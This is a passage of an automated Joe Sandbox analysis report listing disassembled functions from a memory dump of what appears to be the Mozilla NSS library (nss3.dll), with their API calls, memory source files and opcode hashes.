                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: sqlite3_log
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 632333372-598938438
                                                              • Opcode ID: 9cec8ce6b13a10fca73c56b67b73ab89c4c4342dc6c485d6b1ee0a85397193bb
                                                              • Instruction ID: f0bda68dd604a79c77b31eaa0b58d28a8f010d23bf2c928463f5ba2950d9cc7a
                                                              • Opcode Fuzzy Hash: 9cec8ce6b13a10fca73c56b67b73ab89c4c4342dc6c485d6b1ee0a85397193bb
                                                              • Instruction Fuzzy Hash: 3C21FF30E04345ABE710CE19C940B6AB7F6BF85318FA085ACD94A9B751E771F944CBE2
                                                              Function 6D19CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D19CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D19CC7B), ref: 6D19CD7A
                                                                • Part of subcall function 6D19CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D19CD8E
                                                                • Part of subcall function 6D19CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D19CDA5
                                                                • Part of subcall function 6D19CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D19CDB8
                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6D19CCB5
                                                              • memcpy.VCRUNTIME140(6D2314F4,6D2302AC,00000090), ref: 6D19CCD3
                                                              • memcpy.VCRUNTIME140(6D231588,6D2302AC,00000090), ref: 6D19CD2B
                                                                • Part of subcall function 6D0B9AC0: socket.WSOCK32(?,00000017,6D0B99BE), ref: 6D0B9AE6
                                                                • Part of subcall function 6D0B9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6D0B99BE), ref: 6D0B9AFC
                                                                • Part of subcall function 6D0C0590: closesocket.WSOCK32(6D0B9A8F,?,?,6D0B9A8F,00000000), ref: 6D0C0597
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                              • String ID: Ipv6_to_Ipv4 layer
                                                              • API String ID: 1231378898-412307543
                                                              • Opcode ID: ceba653f35eb36db3bb3106c7f4ab35c7b4c891437322ddae962e0f930409cb8
                                                              • Instruction ID: be0c714e19f446289821fdce8483bd3796d1cc4d9cd666665683ba543f0f8734
                                                              • Opcode Fuzzy Hash: ceba653f35eb36db3bb3106c7f4ab35c7b4c891437322ddae962e0f930409cb8
                                                              • Instruction Fuzzy Hash: 221181F99047549EEB228F5A9849B537BB8A34625DF120029E60EDB349E7F14481CBD3
                                                              Function 6D141D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6D141D8F
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D141DA6
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D141E13
                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D141ED0
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                              • String ID:
                                                              • API String ID: 84796498-0
                                                              • Opcode ID: 047f7b7ac01b7ffcf8b0672c46ca0b674935fe243e42a62549ab587f67e5f0ef
                                                              • Instruction ID: 1158956b2bc37481b71434ade283f1a1e783cec2304a4a9b891a28f0899215a6
                                                              • Opcode Fuzzy Hash: 047f7b7ac01b7ffcf8b0672c46ca0b674935fe243e42a62549ab587f67e5f0ef
                                                              • Instruction Fuzzy Hash: 5251AE75A40309DFDB01CF94C884BAEB7B6FF49308F118129E919AF258D7B1E995CB80
                                                              Function 6D1A7DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D1A7E10
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D1A7EA6
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D1A7EB5
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D1A7ED8
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: _byteswap_ulong
                                                              • String ID:
                                                              • API String ID: 4101233201-0
                                                              • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                              • Instruction ID: f0d94331eec2d433225310123fde88db5dbca82e824c1a36c772303ca4395690
                                                              • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                              • Instruction Fuzzy Hash: 1831B7B5E402118FD705CF08C89099AB7E2FF88314B1F816AD9595B319EBB1ED51CBD1
                                                              Function 6D0D6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D0D6C8D
                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6D0D6CA9
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6D0D6CC0
                                                              • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6D1F8FE0), ref: 6D0D6CFE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                              • String ID:
                                                              • API String ID: 2370200771-0
                                                              • Opcode ID: 6a8b2fd9723cc2934a71ef5abed0a170e1ff47acfd03b58644a915068e47ad1c
                                                              • Instruction ID: c8c5e6b1f020e938e29a4734c9654a1ce9d3a1903d5a7d76217701577539333b
                                                              • Opcode Fuzzy Hash: 6a8b2fd9723cc2934a71ef5abed0a170e1ff47acfd03b58644a915068e47ad1c
                                                              • Instruction Fuzzy Hash: 8A318BB1A0021A9FEB08DFA5D890ABFBBF5EB49244B50442ED905E7300EB719901CBE0
                                                              Function 6D146DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6D146E36
                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D146E57
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6D146E7D
                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6D146EAA
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: IntervalMilliseconds$ErrorValue
                                                              • String ID:
                                                              • API String ID: 3163584228-0
                                                              • Opcode ID: 923b32d96bc5575d271b93ae2eff7f3bb68404659d8774889446d2f7d93c0b6c
                                                              • Instruction ID: 501ff9f90d158102fd3cfcec674f34f75e150585d51513d1040af7dd2fe3a66d
                                                              • Opcode Fuzzy Hash: 923b32d96bc5575d271b93ae2eff7f3bb68404659d8774889446d2f7d93c0b6c
                                                              • Instruction Fuzzy Hash: 8331DF3169461BEEDB149F34C8143EBB7E4AB2131EF11863CD999A6248EBB06854CBD1
                                                              Function 6D12DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6D12DDB1,?,00000000), ref: 6D12DDF4
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6D12DDB1,?,00000000), ref: 6D12DE0B
                                                              • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6D12DDB1,?,00000000), ref: 6D12DE17
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • PR_SetError.NSS3(FFFFE009,00000000), ref: 6D12DE80
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                              • String ID:
                                                              • API String ID: 3725328900-0
                                                              • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                              • Instruction ID: d3bb6380ea05c4ff9867183b33a9dae227dc38049b6251d58c52ff27d7ea1272
                                                              • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                              • Instruction Fuzzy Hash: 3F31C2B1944B429BE700CF16D880666B7E4BFF5328B15822AD91C87709E7F6E5E0CBD0
                                                              Function 6D142DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6D142E08
                                                                • Part of subcall function 6D1314C0: TlsGetValue.KERNEL32 ref: 6D1314E0
                                                                • Part of subcall function 6D1314C0: EnterCriticalSection.KERNEL32 ref: 6D1314F5
                                                                • Part of subcall function 6D1314C0: PR_Unlock.NSS3 ref: 6D13150D
                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6D142E1C
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6D142E3B
                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D142E95
                                                                • Part of subcall function 6D131200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6D0D88A4,00000000,00000000), ref: 6D131228
                                                                • Part of subcall function 6D131200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6D131238
                                                                • Part of subcall function 6D131200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6D0D88A4,00000000,00000000), ref: 6D13124B
                                                                • Part of subcall function 6D131200: PR_CallOnce.NSS3(6D232AA4,6D1312D0,00000000,00000000,00000000,?,6D0D88A4,00000000,00000000), ref: 6D13125D
                                                                • Part of subcall function 6D131200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6D13126F
                                                                • Part of subcall function 6D131200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6D131280
                                                                • Part of subcall function 6D131200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6D13128E
                                                                • Part of subcall function 6D131200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6D13129A
                                                                • Part of subcall function 6D131200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6D1312A1
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                              • String ID:
                                                              • API String ID: 1441289343-0
                                                              • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                              • Instruction ID: 7b3083e9b7adcb6e7c37c996c748dec30ff5b4e4aa2dccb6b02ec7044d409d9e
                                                              • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                              • Instruction Fuzzy Hash: D321F971E543554BEB10CF549D4077B37646FA130CF138269DE08AB24AF7F2D5D482A1
                                                              Function 6D0FACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CERT_NewCertList.NSS3 ref: 6D0FACC2
                                                                • Part of subcall function 6D0D2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6D0D2F0A
                                                                • Part of subcall function 6D0D2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D0D2F1D
                                                                • Part of subcall function 6D0D2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6D0D0A1B,00000000), ref: 6D0D2AF0
                                                                • Part of subcall function 6D0D2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0D2B11
                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6D0FAD5E
                                                                • Part of subcall function 6D1157D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6D0DB41E,00000000,00000000,?,00000000,?,6D0DB41E,00000000,00000000,00000001,?), ref: 6D1157E0
                                                                • Part of subcall function 6D1157D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6D115843
                                                              • CERT_DestroyCertList.NSS3(?), ref: 6D0FAD36
                                                                • Part of subcall function 6D0D2F50: CERT_DestroyCertificate.NSS3(?), ref: 6D0D2F65
                                                                • Part of subcall function 6D0D2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D0D2F83
                                                              • free.MOZGLUE(?), ref: 6D0FAD4F
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                              • String ID:
                                                              • API String ID: 132756963-0
                                                              • Opcode ID: 4f508c9c690b11861508b250e00b442bd96f1005765f23c1362cc5ce7b7fa68b
                                                              • Instruction ID: 17988873b21fa8584a8dba0cd79e238ef8a6f2b9963d9060f6aadd1e8aff4a44
                                                              • Opcode Fuzzy Hash: 4f508c9c690b11861508b250e00b442bd96f1005765f23c1362cc5ce7b7fa68b
                                                              • Instruction Fuzzy Hash: 6921C3B1C043148BFB10DFA4D905BAEB7B4EF45208F664069DC05BB201FB31AA56CBE1
                                                              Function 6D123C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D123C9E
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D123CAE
                                                              • PR_Unlock.NSS3(?), ref: 6D123CEA
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D123D02
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterErrorSectionUnlockValue
                                                              • String ID:
                                                              • API String ID: 284873373-0
                                                              • Opcode ID: 49222044693afc985239d1dc6ced681914654a036152cced891f14031bb50d04
                                                              • Instruction ID: a129b98aeb93076ce0b73b8fd5d9540db86967f074ba9d1acba3028c0eb2f394
                                                              • Opcode Fuzzy Hash: 49222044693afc985239d1dc6ced681914654a036152cced891f14031bb50d04
                                                              • Instruction Fuzzy Hash: D81196759042089FDB009F24EC48A9A3778EF49368F564065FD0497315E772ED91CBE1
                                                              Function 6D12ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6D12F0AD,6D12F150,?,6D12F150,?,?,?), ref: 6D12ECBA
                                                                • Part of subcall function 6D130FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D0D87ED,00000800,6D0CEF74,00000000), ref: 6D131000
                                                                • Part of subcall function 6D130FF0: PR_NewLock.NSS3(?,00000800,6D0CEF74,00000000), ref: 6D131016
                                                                • Part of subcall function 6D130FF0: PL_InitArenaPool.NSS3(00000000,security,6D0D87ED,00000008,?,00000800,6D0CEF74,00000000), ref: 6D13102B
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6D12ECD1
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6D12ED02
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13116E
                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6D12ED5A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                              • String ID:
                                                              • API String ID: 2957673229-0
                                                              • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                              • Instruction ID: d694148b03038c3bf4e4a4da70b20488e7bb316c361625608dd7d3e0c0c63ed6
                                                              • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                              • Instruction Fuzzy Hash: B021A1B1A047469BE700CF25D944B62B7E4BFA4348F16C219E81CCB665EBB1E6D0CA90
                                                              Function 6D15EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6D147FFA,?,6D149767,?,8B7874C0,0000A48E), ref: 6D15EDD4
                                                              • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6D147FFA,?,6D149767,?,8B7874C0,0000A48E), ref: 6D15EDFD
                                                              • PORT_Alloc_Util.NSS3(?,00000000,00000000,6D147FFA,?,6D149767,?,8B7874C0,0000A48E), ref: 6D15EE14
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
